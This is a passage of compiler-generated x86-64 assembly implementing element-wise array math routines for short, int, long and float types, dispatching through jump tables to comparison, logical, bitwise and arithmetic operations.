movq -8(%rbp), %rax
movw %cx, (%rax)
jmp LBB1_31
LBB1_15: ## in Loop: Header=BB1_1 Depth=1
cmpw $0, -10(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
movw %ax, %cx
movq -8(%rbp), %rax
movw %cx, (%rax)
jmp LBB1_31
LBB1_16: ## in Loop: Header=BB1_1 Depth=1
movswl -10(%rbp), %eax
movq -24(%rbp), %rcx
movswl (%rcx), %ecx
## kill: def $cl killed $ecx
shll %cl, %eax
movw %ax, %cx
movq -8(%rbp), %rax
movw %cx, (%rax)
jmp LBB1_31
LBB1_17: ## in Loop: Header=BB1_1 Depth=1
movswl -10(%rbp), %eax
movq -24(%rbp), %rcx
movswl (%rcx), %ecx
## kill: def $cl killed $ecx
sarl %cl, %eax
movw %ax, %cx
movq -8(%rbp), %rax
movw %cx, (%rax)
jmp LBB1_31
LBB1_18: ## in Loop: Header=BB1_1 Depth=1
movswl -10(%rbp), %eax
movq -24(%rbp), %rcx
movswl (%rcx), %ecx
andl %ecx, %eax
movw %ax, %cx
movq -8(%rbp), %rax
movw %cx, (%rax)
jmp LBB1_31
LBB1_19: ## in Loop: Header=BB1_1 Depth=1
movswl -10(%rbp), %eax
movq -24(%rbp), %rcx
movswl (%rcx), %ecx
orl %ecx, %eax
movw %ax, %cx
movq -8(%rbp), %rax
movw %cx, (%rax)
jmp LBB1_31
LBB1_20: ## in Loop: Header=BB1_1 Depth=1
movswl -10(%rbp), %eax
movq -24(%rbp), %rcx
movswl (%rcx), %ecx
xorl %ecx, %eax
movw %ax, %cx
movq -8(%rbp), %rax
movw %cx, (%rax)
jmp LBB1_31
LBB1_21: ## in Loop: Header=BB1_1 Depth=1
movswl -10(%rbp), %eax
xorl $-1, %eax
movw %ax, %cx
movq -8(%rbp), %rax
movw %cx, (%rax)
jmp LBB1_31
LBB1_22: ## in Loop: Header=BB1_1 Depth=1
movw -10(%rbp), %cx
movq -8(%rbp), %rax
movw %cx, (%rax)
jmp LBB1_31
LBB1_23: ## in Loop: Header=BB1_1 Depth=1
movswl -10(%rbp), %eax
movq -24(%rbp), %rcx
movswl (%rcx), %ecx
addl %ecx, %eax
movw %ax, %cx
movq -8(%rbp), %rax
movw %cx, (%rax)
jmp LBB1_31
LBB1_24: ## in Loop: Header=BB1_1 Depth=1
movswl -10(%rbp), %eax
movq -24(%rbp), %rcx
movswl (%rcx), %ecx
subl %ecx, %eax
movw %ax, %cx
movq -8(%rbp), %rax
movw %cx, (%rax)
jmp LBB1_31
LBB1_25: ## in Loop: Header=BB1_1 Depth=1
movswl -10(%rbp), %eax
movq -24(%rbp), %rcx
movswl (%rcx), %ecx
imull %ecx, %eax
movw %ax, %cx
movq -8(%rbp), %rax
movw %cx, (%rax)
jmp LBB1_31
LBB1_26: ## in Loop: Header=BB1_1 Depth=1
movswl -10(%rbp), %eax
movq -24(%rbp), %rcx
movswl (%rcx), %ecx
cltd
idivl %ecx
movw %ax, %cx
movq -8(%rbp), %rax
movw %cx, (%rax)
jmp LBB1_31
LBB1_27: ## in Loop: Header=BB1_1 Depth=1
movswl -10(%rbp), %eax
movq -24(%rbp), %rcx
movswl (%rcx), %ecx
cltd
idivl %ecx
movw %dx, %cx
movq -8(%rbp), %rax
movw %cx, (%rax)
jmp LBB1_31
LBB1_28: ## in Loop: Header=BB1_1 Depth=1
movswl -10(%rbp), %eax
addl $1, %eax
movw %ax, %cx
movq -8(%rbp), %rax
movw %cx, (%rax)
jmp LBB1_31
LBB1_29: ## in Loop: Header=BB1_1 Depth=1
movswl -10(%rbp), %eax
subl $1, %eax
movw %ax, %cx
movq -8(%rbp), %rax
movw %cx, (%rax)
jmp LBB1_31
LBB1_30:
jmp LBB1_32
LBB1_31: ## in Loop: Header=BB1_1 Depth=1
movq -8(%rbp), %rax
addq $2, %rax
movq %rax, -8(%rbp)
movq -24(%rbp), %rax
addq $2, %rax
movq %rax, -24(%rbp)
jmp LBB1_1
LBB1_32:
popq %rbp
retq
.cfi_endproc
.p2align 2, 0x90
.data_region jt32
.set L1_0_set_3, LBB1_3-LJTI1_0
.set L1_0_set_4, LBB1_4-LJTI1_0
.set L1_0_set_5, LBB1_5-LJTI1_0
.set L1_0_set_6, LBB1_6-LJTI1_0
.set L1_0_set_7, LBB1_7-LJTI1_0
.set L1_0_set_8, LBB1_8-LJTI1_0
.set L1_0_set_9, LBB1_9-LJTI1_0
.set L1_0_set_12, LBB1_12-LJTI1_0
.set L1_0_set_15, LBB1_15-LJTI1_0
.set L1_0_set_16, LBB1_16-LJTI1_0
.set L1_0_set_17, LBB1_17-LJTI1_0
.set L1_0_set_18, LBB1_18-LJTI1_0
.set L1_0_set_19, LBB1_19-LJTI1_0
.set L1_0_set_20, LBB1_20-LJTI1_0
.set L1_0_set_21, LBB1_21-LJTI1_0
.set L1_0_set_22, LBB1_22-LJTI1_0
.set L1_0_set_23, LBB1_23-LJTI1_0
.set L1_0_set_24, LBB1_24-LJTI1_0
.set L1_0_set_25, LBB1_25-LJTI1_0
.set L1_0_set_26, LBB1_26-LJTI1_0
.set L1_0_set_27, LBB1_27-LJTI1_0
.set L1_0_set_28, LBB1_28-LJTI1_0
.set L1_0_set_29, LBB1_29-LJTI1_0
LJTI1_0:
.long L1_0_set_3
.long L1_0_set_4
.long L1_0_set_5
.long L1_0_set_6
.long L1_0_set_7
.long L1_0_set_8
.long L1_0_set_9
.long L1_0_set_12
.long L1_0_set_15
.long L1_0_set_16
.long L1_0_set_17
.long L1_0_set_18
.long L1_0_set_19
.long L1_0_set_20
.long L1_0_set_21
.long L1_0_set_22
.long L1_0_set_23
.long L1_0_set_24
.long L1_0_set_25
.long L1_0_set_26
.long L1_0_set_27
.long L1_0_set_28
.long L1_0_set_29
.end_data_region
## -- End function
.globl _iArrayMathCA ## -- Begin function iArrayMathCA
.p2align 4, 0x90
_iArrayMathCA: ## @iArrayMathCA
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movb %r8b, %al
movq %rdi, -8(%rbp)
movl %esi, -12(%rbp)
movq %rdx, -24(%rbp)
movq %rcx, -32(%rbp)
movb %al, -33(%rbp)
LBB2_1: ## =>This Inner Loop Header: Depth=1
movq -32(%rbp), %rax
movq %rax, %rcx
addq $-1, %rcx
movq %rcx, -32(%rbp)
cmpq $0, %rax
jbe LBB2_32
## %bb.2: ## in Loop: Header=BB2_1 Depth=1
movzbl -33(%rbp), %eax
## kill: def $rax killed $eax
movq %rax, -48(%rbp) ## 8-byte Spill
subq $22, %rax
ja LBB2_30
## %bb.33: ## in Loop: Header=BB2_1 Depth=1
movq -48(%rbp), %rax ## 8-byte Reload
leaq LJTI2_0(%rip), %rcx
movslq (%rcx,%rax,4), %rax
addq %rcx, %rax
jmpq *%rax
LBB2_3: ## in Loop: Header=BB2_1 Depth=1
movl -12(%rbp), %eax
movq -24(%rbp), %rcx
cmpl (%rcx), %eax
sete %al
andb $1, %al
movzbl %al, %ecx
movq -8(%rbp), %rax
movl %ecx, (%rax)
jmp LBB2_31
LBB2_4: ## in Loop: Header=BB2_1 Depth=1
movl -12(%rbp), %eax
movq -24(%rbp), %rcx
cmpl (%rcx), %eax
setne %al
andb $1, %al
movzbl %al, %ecx
movq -8(%rbp), %rax
movl %ecx, (%rax)
jmp LBB2_31
LBB2_5: ## in Loop: Header=BB2_1 Depth=1
movl -12(%rbp), %eax
movq -24(%rbp), %rcx
cmpl (%rcx), %eax
setl %al
andb $1, %al
movzbl %al, %ecx
movq -8(%rbp), %rax
movl %ecx, (%rax)
jmp LBB2_31
LBB2_6: ## in Loop: Header=BB2_1 Depth=1
movl -12(%rbp), %eax
movq -24(%rbp), %rcx
cmpl (%rcx), %eax
setg %al
andb $1, %al
movzbl %al, %ecx
movq -8(%rbp), %rax
movl %ecx, (%rax)
jmp LBB2_31
LBB2_7: ## in Loop: Header=BB2_1 Depth=1
movl -12(%rbp), %eax
movq -24(%rbp), %rcx
cmpl (%rcx), %eax
setle %al
andb $1, %al
movzbl %al, %ecx
movq -8(%rbp), %rax
movl %ecx, (%rax)
jmp LBB2_31
LBB2_8: ## in Loop: Header=BB2_1 Depth=1
movl -12(%rbp), %eax
movq -24(%rbp), %rcx
cmpl (%rcx), %eax
setge %al
andb $1, %al
movzbl %al, %ecx
movq -8(%rbp), %rax
movl %ecx, (%rax)
jmp LBB2_31
LBB2_9: ## in Loop: Header=BB2_1 Depth=1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, -12(%rbp)
movb %al, -49(%rbp) ## 1-byte Spill
je LBB2_11
## %bb.10: ## in Loop: Header=BB2_1 Depth=1
movq -24(%rbp), %rax
cmpl $0, (%rax)
setne %al
movb %al, -49(%rbp) ## 1-byte Spill
LBB2_11: ## in Loop: Header=BB2_1 Depth=1
movb -49(%rbp), %al ## 1-byte Reload
andb $1, %al
movzbl %al, %ecx
movq -8(%rbp), %rax
movl %ecx, (%rax)
jmp LBB2_31
LBB2_12: ## in Loop: Header=BB2_1 Depth=1
movb $1, %al
cmpl $0, -12(%rbp)
movb %al, -50(%rbp) ## 1-byte Spill
jne LBB2_14
## %bb.13: ## in Loop: Header=BB2_1 Depth=1
movq -24(%rbp), %rax
cmpl $0, (%rax)
setne %al
movb %al, -50(%rbp) ## 1-byte Spill
LBB2_14: ## in Loop: Header=BB2_1 Depth=1
movb -50(%rbp), %al ## 1-byte Reload
andb $1, %al
movzbl %al, %ecx
movq -8(%rbp), %rax
movl %ecx, (%rax)
jmp LBB2_31
LBB2_15: ## in Loop: Header=BB2_1 Depth=1
cmpl $0, -12(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %ecx
movq -8(%rbp), %rax
movl %ecx, (%rax)
jmp LBB2_31
LBB2_16: ## in Loop: Header=BB2_1 Depth=1
movl -12(%rbp), %eax
movq -24(%rbp), %rcx
movl (%rcx), %ecx
## kill: def $cl killed $ecx
shll %cl, %eax
movl %eax, %ecx
movq -8(%rbp), %rax
movl %ecx, (%rax)
jmp LBB2_31
LBB2_17: ## in Loop: Header=BB2_1 Depth=1
movl -12(%rbp), %eax
movq -24(%rbp), %rcx
movl (%rcx), %ecx
## kill: def $cl killed $ecx
sarl %cl, %eax
movl %eax, %ecx
movq -8(%rbp), %rax
movl %ecx, (%rax)
jmp LBB2_31
LBB2_18: ## in Loop: Header=BB2_1 Depth=1
movl -12(%rbp), %ecx
movq -24(%rbp), %rax
andl (%rax), %ecx
movq -8(%rbp), %rax
movl %ecx, (%rax)
jmp LBB2_31
LBB2_19: ## in Loop: Header=BB2_1 Depth=1
movl -12(%rbp), %ecx
movq -24(%rbp), %rax
orl (%rax), %ecx
movq -8(%rbp), %rax
movl %ecx, (%rax)
jmp LBB2_31
LBB2_20: ## in Loop: Header=BB2_1 Depth=1
movl -12(%rbp), %ecx
movq -24(%rbp), %rax
xorl (%rax), %ecx
movq -8(%rbp), %rax
movl %ecx, (%rax)
jmp LBB2_31
LBB2_21: ## in Loop: Header=BB2_1 Depth=1
movl -12(%rbp), %ecx
xorl $-1, %ecx
movq -8(%rbp), %rax
movl %ecx, (%rax)
jmp LBB2_31
LBB2_22: ## in Loop: Header=BB2_1 Depth=1
movl -12(%rbp), %ecx
movq -8(%rbp), %rax
movl %ecx, (%rax)
jmp LBB2_31
LBB2_23: ## in Loop: Header=BB2_1 Depth=1
movl -12(%rbp), %ecx
movq -24(%rbp), %rax
addl (%rax), %ecx
movq -8(%rbp), %rax
movl %ecx, (%rax)
jmp LBB2_31
LBB2_24: ## in Loop: Header=BB2_1 Depth=1
movl -12(%rbp), %ecx
movq -24(%rbp), %rax
subl (%rax), %ecx
movq -8(%rbp), %rax
movl %ecx, (%rax)
jmp LBB2_31
LBB2_25: ## in Loop: Header=BB2_1 Depth=1
movl -12(%rbp), %ecx
movq -24(%rbp), %rax
imull (%rax), %ecx
movq -8(%rbp), %rax
movl %ecx, (%rax)
jmp LBB2_31
LBB2_26: ## in Loop: Header=BB2_1 Depth=1
movl -12(%rbp), %eax
movq -24(%rbp), %rcx
cltd
idivl (%rcx)
movl %eax, %ecx
movq -8(%rbp), %rax
movl %ecx, (%rax)
jmp LBB2_31
LBB2_27: ## in Loop: Header=BB2_1 Depth=1
movl -12(%rbp), %eax
movq -24(%rbp), %rcx
cltd
idivl (%rcx)
movq -8(%rbp), %rax
movl %edx, (%rax)
jmp LBB2_31
LBB2_28: ## in Loop: Header=BB2_1 Depth=1
movl -12(%rbp), %ecx
addl $1, %ecx
movq -8(%rbp), %rax
movl %ecx, (%rax)
jmp LBB2_31
LBB2_29: ## in Loop: Header=BB2_1 Depth=1
movl -12(%rbp), %ecx
subl $1, %ecx
movq -8(%rbp), %rax
movl %ecx, (%rax)
jmp LBB2_31
LBB2_30:
jmp LBB2_32
LBB2_31: ## in Loop: Header=BB2_1 Depth=1
movq -8(%rbp), %rax
addq $4, %rax
movq %rax, -8(%rbp)
movq -24(%rbp), %rax
addq $4, %rax
movq %rax, -24(%rbp)
jmp LBB2_1
LBB2_32:
popq %rbp
retq
.cfi_endproc
.p2align 2, 0x90
.data_region jt32
.set L2_0_set_3, LBB2_3-LJTI2_0
.set L2_0_set_4, LBB2_4-LJTI2_0
.set L2_0_set_5, LBB2_5-LJTI2_0
.set L2_0_set_6, LBB2_6-LJTI2_0
.set L2_0_set_7, LBB2_7-LJTI2_0
.set L2_0_set_8, LBB2_8-LJTI2_0
.set L2_0_set_9, LBB2_9-LJTI2_0
.set L2_0_set_12, LBB2_12-LJTI2_0
.set L2_0_set_15, LBB2_15-LJTI2_0
.set L2_0_set_16, LBB2_16-LJTI2_0
.set L2_0_set_17, LBB2_17-LJTI2_0
.set L2_0_set_18, LBB2_18-LJTI2_0
.set L2_0_set_19, LBB2_19-LJTI2_0
.set L2_0_set_20, LBB2_20-LJTI2_0
.set L2_0_set_21, LBB2_21-LJTI2_0
.set L2_0_set_22, LBB2_22-LJTI2_0
.set L2_0_set_23, LBB2_23-LJTI2_0
.set L2_0_set_24, LBB2_24-LJTI2_0
.set L2_0_set_25, LBB2_25-LJTI2_0
.set L2_0_set_26, LBB2_26-LJTI2_0
.set L2_0_set_27, LBB2_27-LJTI2_0
.set L2_0_set_28, LBB2_28-LJTI2_0
.set L2_0_set_29, LBB2_29-LJTI2_0
LJTI2_0:
.long L2_0_set_3
.long L2_0_set_4
.long L2_0_set_5
.long L2_0_set_6
.long L2_0_set_7
.long L2_0_set_8
.long L2_0_set_9
.long L2_0_set_12
.long L2_0_set_15
.long L2_0_set_16
.long L2_0_set_17
.long L2_0_set_18
.long L2_0_set_19
.long L2_0_set_20
.long L2_0_set_21
.long L2_0_set_22
.long L2_0_set_23
.long L2_0_set_24
.long L2_0_set_25
.long L2_0_set_26
.long L2_0_set_27
.long L2_0_set_28
.long L2_0_set_29
.end_data_region
## -- End function
.globl _lArrayMathCA ## -- Begin function lArrayMathCA
.p2align 4, 0x90
_lArrayMathCA: ## @lArrayMathCA
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movb %r8b, %al
movq %rdi, -8(%rbp)
movq %rsi, -16(%rbp)
movq %rdx, -24(%rbp)
movq %rcx, -32(%rbp)
movb %al, -33(%rbp)
LBB3_1: ## =>This Inner Loop Header: Depth=1
movq -32(%rbp), %rax
movq %rax, %rcx
addq $-1, %rcx
movq %rcx, -32(%rbp)
cmpq $0, %rax
jbe LBB3_32
## %bb.2: ## in Loop: Header=BB3_1 Depth=1
movzbl -33(%rbp), %eax
## kill: def $rax killed $eax
movq %rax, -48(%rbp) ## 8-byte Spill
subq $22, %rax
ja LBB3_30
## %bb.33: ## in Loop: Header=BB3_1 Depth=1
movq -48(%rbp), %rax ## 8-byte Reload
leaq LJTI3_0(%rip), %rcx
movslq (%rcx,%rax,4), %rax
addq %rcx, %rax
jmpq *%rax
LBB3_3: ## in Loop: Header=BB3_1 Depth=1
movq -16(%rbp), %rax
movq -24(%rbp), %rcx
cmpq (%rcx), %rax
sete %al
andb $1, %al
movzbl %al, %eax
movslq %eax, %rcx
movq -8(%rbp), %rax
movq %rcx, (%rax)
jmp LBB3_31
LBB3_4: ## in Loop: Header=BB3_1 Depth=1
movq -16(%rbp), %rax
movq -24(%rbp), %rcx
cmpq (%rcx), %rax
setne %al
andb $1, %al
movzbl %al, %eax
movslq %eax, %rcx
movq -8(%rbp), %rax
movq %rcx, (%rax)
jmp LBB3_31
LBB3_5: ## in Loop: Header=BB3_1 Depth=1
movq -16(%rbp), %rax
movq -24(%rbp), %rcx
cmpq (%rcx), %rax
setl %al
andb $1, %al
movzbl %al, %eax
movslq %eax, %rcx
movq -8(%rbp), %rax
movq %rcx, (%rax)
jmp LBB3_31
LBB3_6: ## in Loop: Header=BB3_1 Depth=1
movq -16(%rbp), %rax
movq -24(%rbp), %rcx
cmpq (%rcx), %rax
setg %al
andb $1, %al
movzbl %al, %eax
movslq %eax, %rcx
movq -8(%rbp), %rax
movq %rcx, (%rax)
jmp LBB3_31
LBB3_7: ## in Loop: Header=BB3_1 Depth=1
movq -16(%rbp), %rax
movq -24(%rbp), %rcx
cmpq (%rcx), %rax
setle %al
andb $1, %al
movzbl %al, %eax
movslq %eax, %rcx
movq -8(%rbp), %rax
movq %rcx, (%rax)
jmp LBB3_31
LBB3_8: ## in Loop: Header=BB3_1 Depth=1
movq -16(%rbp), %rax
movq -24(%rbp), %rcx
cmpq (%rcx), %rax
setge %al
andb $1, %al
movzbl %al, %eax
movslq %eax, %rcx
movq -8(%rbp), %rax
movq %rcx, (%rax)
jmp LBB3_31
LBB3_9: ## in Loop: Header=BB3_1 Depth=1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpq $0, -16(%rbp)
movb %al, -49(%rbp) ## 1-byte Spill
je LBB3_11
## %bb.10: ## in Loop: Header=BB3_1 Depth=1
movq -24(%rbp), %rax
cmpq $0, (%rax)
setne %al
movb %al, -49(%rbp) ## 1-byte Spill
LBB3_11: ## in Loop: Header=BB3_1 Depth=1
movb -49(%rbp), %al ## 1-byte Reload
andb $1, %al
movzbl %al, %eax
movslq %eax, %rcx
movq -8(%rbp), %rax
movq %rcx, (%rax)
jmp LBB3_31
LBB3_12: ## in Loop: Header=BB3_1 Depth=1
movb $1, %al
cmpq $0, -16(%rbp)
movb %al, -50(%rbp) ## 1-byte Spill
jne LBB3_14
## %bb.13: ## in Loop: Header=BB3_1 Depth=1
movq -24(%rbp), %rax
cmpq $0, (%rax)
setne %al
movb %al, -50(%rbp) ## 1-byte Spill
LBB3_14: ## in Loop: Header=BB3_1 Depth=1
movb -50(%rbp), %al ## 1-byte Reload
andb $1, %al
movzbl %al, %eax
movslq %eax, %rcx
movq -8(%rbp), %rax
movq %rcx, (%rax)
jmp LBB3_31
LBB3_15: ## in Loop: Header=BB3_1 Depth=1
cmpq $0, -16(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
movslq %eax, %rcx
movq -8(%rbp), %rax
movq %rcx, (%rax)
jmp LBB3_31
LBB3_16: ## in Loop: Header=BB3_1 Depth=1
movq -16(%rbp), %rax
movq -24(%rbp), %rcx
movq (%rcx), %rcx
## kill: def $cl killed $rcx
shlq %cl, %rax
movq %rax, %rcx
movq -8(%rbp), %rax
movq %rcx, (%rax)
jmp LBB3_31
LBB3_17: ## in Loop: Header=BB3_1 Depth=1
movq -16(%rbp), %rax
movq -24(%rbp), %rcx
movq (%rcx), %rcx
## kill: def $cl killed $rcx
sarq %cl, %rax
movq %rax, %rcx
movq -8(%rbp), %rax
movq %rcx, (%rax)
jmp LBB3_31
LBB3_18: ## in Loop: Header=BB3_1 Depth=1
movq -16(%rbp), %rcx
movq -24(%rbp), %rax
andq (%rax), %rcx
movq -8(%rbp), %rax
movq %rcx, (%rax)
jmp LBB3_31
LBB3_19: ## in Loop: Header=BB3_1 Depth=1
movq -16(%rbp), %rcx
movq -24(%rbp), %rax
orq (%rax), %rcx
movq -8(%rbp), %rax
movq %rcx, (%rax)
jmp LBB3_31
LBB3_20: ## in Loop: Header=BB3_1 Depth=1
movq -16(%rbp), %rcx
movq -24(%rbp), %rax
xorq (%rax), %rcx
movq -8(%rbp), %rax
movq %rcx, (%rax)
jmp LBB3_31
LBB3_21: ## in Loop: Header=BB3_1 Depth=1
movq -16(%rbp), %rcx
xorq $-1, %rcx
movq -8(%rbp), %rax
movq %rcx, (%rax)
jmp LBB3_31
LBB3_22: ## in Loop: Header=BB3_1 Depth=1
movq -16(%rbp), %rcx
movq -8(%rbp), %rax
movq %rcx, (%rax)
jmp LBB3_31
LBB3_23: ## in Loop: Header=BB3_1 Depth=1
movq -16(%rbp), %rcx
movq -24(%rbp), %rax
addq (%rax), %rcx
movq -8(%rbp), %rax
movq %rcx, (%rax)
jmp LBB3_31
LBB3_24: ## in Loop: Header=BB3_1 Depth=1
movq -16(%rbp), %rcx
movq -24(%rbp), %rax
subq (%rax), %rcx
movq -8(%rbp), %rax
movq %rcx, (%rax)
jmp LBB3_31
LBB3_25: ## in Loop: Header=BB3_1 Depth=1
movq -16(%rbp), %rcx
movq -24(%rbp), %rax
imulq (%rax), %rcx
movq -8(%rbp), %rax
movq %rcx, (%rax)
jmp LBB3_31
LBB3_26: ## in Loop: Header=BB3_1 Depth=1
movq -16(%rbp), %rax
movq -24(%rbp), %rcx
cqto
idivq (%rcx)
movq %rax, %rcx
movq -8(%rbp), %rax
movq %rcx, (%rax)
jmp LBB3_31
LBB3_27: ## in Loop: Header=BB3_1 Depth=1
movq -16(%rbp), %rax
movq -24(%rbp), %rcx
cqto
idivq (%rcx)
movq -8(%rbp), %rax
movq %rdx, (%rax)
jmp LBB3_31
LBB3_28: ## in Loop: Header=BB3_1 Depth=1
movq -16(%rbp), %rcx
addq $1, %rcx
movq -8(%rbp), %rax
movq %rcx, (%rax)
jmp LBB3_31
LBB3_29: ## in Loop: Header=BB3_1 Depth=1
movq -16(%rbp), %rcx
subq $1, %rcx
movq -8(%rbp), %rax
movq %rcx, (%rax)
jmp LBB3_31
LBB3_30:
jmp LBB3_32
LBB3_31: ## in Loop: Header=BB3_1 Depth=1
movq -8(%rbp), %rax
addq $8, %rax
movq %rax, -8(%rbp)
movq -24(%rbp), %rax
addq $8, %rax
movq %rax, -24(%rbp)
jmp LBB3_1
LBB3_32:
popq %rbp
retq
.cfi_endproc
.p2align 2, 0x90
.data_region jt32
.set L3_0_set_3, LBB3_3-LJTI3_0
.set L3_0_set_4, LBB3_4-LJTI3_0
.set L3_0_set_5, LBB3_5-LJTI3_0
.set L3_0_set_6, LBB3_6-LJTI3_0
.set L3_0_set_7, LBB3_7-LJTI3_0
.set L3_0_set_8, LBB3_8-LJTI3_0
.set L3_0_set_9, LBB3_9-LJTI3_0
.set L3_0_set_12, LBB3_12-LJTI3_0
.set L3_0_set_15, LBB3_15-LJTI3_0
.set L3_0_set_16, LBB3_16-LJTI3_0
.set L3_0_set_17, LBB3_17-LJTI3_0
.set L3_0_set_18, LBB3_18-LJTI3_0
.set L3_0_set_19, LBB3_19-LJTI3_0
.set L3_0_set_20, LBB3_20-LJTI3_0
.set L3_0_set_21, LBB3_21-LJTI3_0
.set L3_0_set_22, LBB3_22-LJTI3_0
.set L3_0_set_23, LBB3_23-LJTI3_0
.set L3_0_set_24, LBB3_24-LJTI3_0
.set L3_0_set_25, LBB3_25-LJTI3_0
.set L3_0_set_26, LBB3_26-LJTI3_0
.set L3_0_set_27, LBB3_27-LJTI3_0
.set L3_0_set_28, LBB3_28-LJTI3_0
.set L3_0_set_29, LBB3_29-LJTI3_0
LJTI3_0:
.long L3_0_set_3
.long L3_0_set_4
.long L3_0_set_5
.long L3_0_set_6
.long L3_0_set_7
.long L3_0_set_8
.long L3_0_set_9
.long L3_0_set_12
.long L3_0_set_15
.long L3_0_set_16
.long L3_0_set_17
.long L3_0_set_18
.long L3_0_set_19
.long L3_0_set_20
.long L3_0_set_21
.long L3_0_set_22
.long L3_0_set_23
.long L3_0_set_24
.long L3_0_set_25
.long L3_0_set_26
.long L3_0_set_27
.long L3_0_set_28
.long L3_0_set_29
.end_data_region
## -- End function
.section __TEXT,__literal4,4byte_literals
.p2align 2 ## -- Begin function fArrayMathCA
LCPI4_0:
.long 0x3f800000 ## float 1
.section __TEXT,__text,regular,pure_instructions
.globl _fArrayMathCA
.p2align 4, 0x90
_fArrayMathCA: ## @fArrayMathCA
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movb %cl, %al
movq %rdi, -8(%rbp)
movss %xmm0, -12(%rbp)
movq %rsi, -24(%rbp)
movq %rdx, -32(%rbp)
movb %al, -33(%rbp)
LBB4_1: ## =>This Inner Loop Header: Depth=1
movq -32(%rbp), %rax
movq %rax, %rcx
addq $-1, %rcx
movq %rcx, -32(%rbp)
cmpq $0, %rax
jbe LBB4_25
## %bb.2: ## in Loop: Header=BB4_1 Depth=1
movzbl -33(%rbp), %eax
## kill: def $rax killed $eax
movq %rax, -48(%rbp) ## 8-byte Spill
subq $22, %rax
ja LBB4_23
## %bb.26: ## in Loop: Header=BB4_1 Depth=1
movq -48(%rbp), %rax ## 8-byte Reload
leaq LJTI4_0(%rip), %rcx
movslq (%rcx,%rax,4), %rax
addq %rcx, %rax
jmpq *%rax
LBB4_3: ## in Loop: Header=BB4_1 Depth=1
movss -12(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
movq -24(%rbp), %rax
ucomiss (%rax), %xmm0
sete %al
setnp %cl
andb %cl, %al
andb $1, %al
movzbl %al, %eax
cvtsi2ss %eax, %xmm0
movq -8(%rbp), %rax
movss %xmm0, (%rax)
jmp LBB4_24
LBB4_4: ## in Loop: Header=BB4_1 Depth=1
movss -12(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
movq -24(%rbp), %rax
ucomiss (%rax), %xmm0
setne %al
setp %cl
orb %cl, %al
andb $1, %al
movzbl %al, %eax
cvtsi2ss %eax, %xmm0
movq -8(%rbp), %rax
movss %xmm0, (%rax)
jmp LBB4_24
LBB4_5: ## in Loop: Header=BB4_1 Depth=1
movss -12(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
movq -24(%rbp), %rax
movss (%rax), %xmm0 ## xmm0 = mem[0],zero,zero,zero
ucomiss %xmm1, %xmm0
seta %al
andb $1, %al
movzbl %al, %eax
cvtsi2ss %eax, %xmm0
movq -8(%rbp), %rax
movss %xmm0, (%rax)
jmp LBB4_24
LBB4_6: ## in Loop: Header=BB4_1 Depth=1
movss -12(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
movq -24(%rbp), %rax
ucomiss (%rax), %xmm0
seta %al
andb $1, %al
movzbl %al, %eax
cvtsi2ss %eax, %xmm0
movq -8(%rbp), %rax
movss %xmm0, (%rax)
jmp LBB4_24
LBB4_7: ## in Loop: Header=BB4_1 Depth=1
movss -12(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
movq -24(%rbp), %rax
movss (%rax), %xmm0 ## xmm0 = mem[0],zero,zero,zero
ucomiss %xmm1, %xmm0
setae %al
andb $1, %al
movzbl %al, %eax
cvtsi2ss %eax, %xmm0
movq -8(%rbp), %rax
movss %xmm0, (%rax)
jmp LBB4_24
LBB4_8: ## in Loop: Header=BB4_1 Depth=1
movss -12(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
movq -24(%rbp), %rax
ucomiss (%rax), %xmm0
setae %al
andb $1, %al
movzbl %al, %eax
cvtsi2ss %eax, %xmm0
movq -8(%rbp), %rax
movss %xmm0, (%rax)
jmp LBB4_24
LBB4_9: ## in Loop: Header=BB4_1 Depth=1
movss -12(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
xorl %eax, %eax
## kill: def $al killed $al killed $eax
xorps %xmm1, %xmm1
ucomiss %xmm1, %xmm0
movb %al, -49(%rbp) ## 1-byte Spill
jne LBB4_10
jp LBB4_10
jmp LBB4_11
LBB4_10: ## in Loop: Header=BB4_1 Depth=1
movq -24(%rbp), %rax
movss (%rax), %xmm0 ## xmm0 = mem[0],zero,zero,zero
xorps %xmm1, %xmm1
ucomiss %xmm1, %xmm0
setne %al
setp %cl
orb %cl, %al
movb %al, -49(%rbp) ## 1-byte Spill
LBB4_11: ## in Loop: Header=BB4_1 Depth=1
movb -49(%rbp), %al ## 1-byte Reload
andb $1, %al
movzbl %al, %eax
cvtsi2ss %eax, %xmm0
movq -8(%rbp), %rax
movss %xmm0, (%rax)
jmp LBB4_24
LBB4_12: ## in Loop: Header=BB4_1 Depth=1
movss -12(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
movb $1, %al
xorps %xmm1, %xmm1
ucomiss %xmm1, %xmm0
movb %al, -50(%rbp) ## 1-byte Spill
jne LBB4_14
jp LBB4_14
## %bb.13: ## in Loop: Header=BB4_1 Depth=1
movq -24(%rbp), %rax
movss (%rax), %xmm0 ## xmm0 = mem[0],zero,zero,zero
xorps %xmm1, %xmm1
ucomiss %xmm1, %xmm0
setne %al
setp %cl
orb %cl, %al
movb %al, -50(%rbp) ## 1-byte Spill
LBB4_14: ## in Loop: Header=BB4_1 Depth=1
movb -50(%rbp), %al ## 1-byte Reload
andb $1, %al
movzbl %al, %eax
cvtsi2ss %eax, %xmm0
movq -8(%rbp), %rax
movss %xmm0, (%rax)
jmp LBB4_24
LBB4_15: ## in Loop: Header=BB4_1 Depth=1
